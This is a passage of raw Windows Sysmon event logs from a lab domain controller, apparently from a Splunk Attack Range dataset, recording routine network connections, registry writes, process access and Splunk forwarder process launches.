AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60754-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local445microsoft-ds 354300x80000000000000002204468Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:07.459{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruetruefe80:0:0:0:0:ffff:ffff:fffe-51488-true2001:7fe:0:0:0:0:0:53i.root-servers.net53domain 23542300x80000000000000002204467Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:11.462{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5D43E624F4F405D8436883EAA304465,SHA256=6A3BE9F9EF7BB42A975D12640675CF09CCC90FD228BA3CF07876B766CCBA341F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204471Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:12.462{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AA4FD35A5C90CDC8A9F93E40C3F5043A,SHA256=731F00C622ABBF42840515498EE30BE87FB57125913A7C3F4A59728E1690A4C1,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002204482Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:10:13.712{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002204481Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:10:13.712{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x095ef1f1) 13241300x80000000000000002204480Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:10:13.712{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d710f7-0xb61afb7a) 13241300x80000000000000002204479Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:10:13.712{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d71100-0x17df637a) 13241300x80000000000000002204478Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:10:13.712{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d71108-0x79a3cb7a) 13241300x80000000000000002204477Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:10:13.712{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x80000000000000002204476Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:10:13.712{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x095ef1f1) 13241300x80000000000000002204475Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:10:13.712{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d710f7-0xb62b2dfc) 13241300x80000000000000002204474Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:10:13.712{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d71100-0x17ef95fc) 13241300x80000000000000002204473Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:10:13.712{5ABCFE62-842D-603E-0B00-00000000AD01}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d71108-0x79b3fdfc) 23542300x80000000000000002204472Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:13.478{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9168200D187A92FC81F276D897449779,SHA256=4415426D763751E8C4A8BD5B74B88B6F4574DD61432FBCB1C3342D71679A25CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204485Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:11.454{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local58761- 23542300x80000000000000002204484Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:14.853{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=96BFCEE94D8D055C1094F50917D75A9E,SHA256=5A99DEE7811FAC32DA1440A745BE9066CFC6B8E2AF8823FD2AA320A58A9E2C4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204483Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:14.493{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE917A21D9BD370784DB5F0822435678,SHA256=54DC624F04D6AA2DD96827CF7A7F856506E9340E976975500637E5EA0DB1ADDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204486Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:15.540{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D5FD75521481D948EF1DCEC0B6E8644,SHA256=A8365F91151691A2D7198E20CC87E3E49FB10885FCCA70B1160EDBEC2B072277,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204489Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:16.540{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=802AA7A0C4A35955F42B250EEE0EB9D3,SHA256=CB5A0F3683231596312E7BB389966CE93F052F7976F45F331B87FA5D6CFE6FB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002204488Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:16.072{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=43127AAF47BD9004D43F7B19AE366DB4,SHA256=67A393B8A7C608D22ACC93D566ED13B8CE034DCF7058352F2193891B3912E87E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002204487Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:12.454{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-58761- 10341000x80000000000000002204500Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.618{5ABCFE62-EA49-6040-674E-00000000AD01}66885928C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002204499Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.587{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=813946C5B1BE86D894F337815A8EF6E1,SHA256=26CAEC1A9A6840F03F9A43AD2077160777CA0B3C8D8043C49EA16E90F4C07B0C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002204498Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.478{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA49-6040-674E-00000000AD01}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204497Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.478{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204496Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.478{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204495Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.478{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204494Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.478{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204493Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.478{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-EA49-6040-674E-00000000AD01}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204492Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.478{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA49-6040-674E-00000000AD01}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204491Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:17.478{5ABCFE62-EA49-6040-674E-00000000AD01}6688C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000002204490Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:12.892{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60755-false10.0.1.12-8000- 10341000x80000000000000002204519Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.947{5ABCFE62-EA4A-6040-694E-00000000AD01}4843392C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204518Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.822{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-EA4A-6040-694E-00000000AD01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204517Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.822{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204516Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.822{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204515Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.822{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204514Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.822{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002204513Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.822{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-EA4A-6040-694E-00000000AD01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002204512Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.822{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-EA4A-6040-694E-00000000AD01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002204511Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.822{5ABCFE62-EA4A-6040-694E-00000000AD01}484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002204510Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:10:18.587{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 